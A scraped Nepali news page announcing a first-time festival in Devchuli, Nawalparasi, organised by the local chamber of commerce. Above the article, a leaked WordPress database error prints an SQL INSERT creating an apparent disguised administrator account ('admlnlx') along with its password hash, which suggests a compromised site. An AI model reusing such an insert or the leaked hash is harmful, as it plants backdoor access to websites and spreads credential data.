WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bbp8ZOYgCCucnTpdH5udK2vN0X.iMf1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 14:40:25', '', 'admlnlx', 'admlnlx')
नवलपरासी,पुस ६-
नवलपरासीको देवचुलीमा फागुन ६ देखी १६ गतेसम्म पहिलोपटक महोत्सव हुने भएको छ। बुधवार देवचुली उघोग बाणिज्य संघले पत्रकार सम्मेलन गरि महोत्सव हुन लागेको जानाकारी गराएको हो ।
देवचुली नगरपालिका भित्र रहेका प्रकृतिक स्रोत साधनको परिचय दिने उद्देश्यले महोत्सव आयोजना गर्न लागिएको उघोग बाणिज्य संघ देवचुलिका अध्यक्ष धर्मराज बस्यालले जानकारी दिनुभयो ।उहांले देवचुलि क्षेत्रमा रहेका प्रकृतिक स्रोत साधन र धार्मिक क्षेत्रलाई महोत्सवले प्रर्वद्धन गर्ने वताउनु भयो। । महोत्सवमा विशेष गरेर धार्मिक , पर्यटन , कृषि, बाल उघान लगायतका स्टलहरु रहने आयोजकले जनाएको छ ।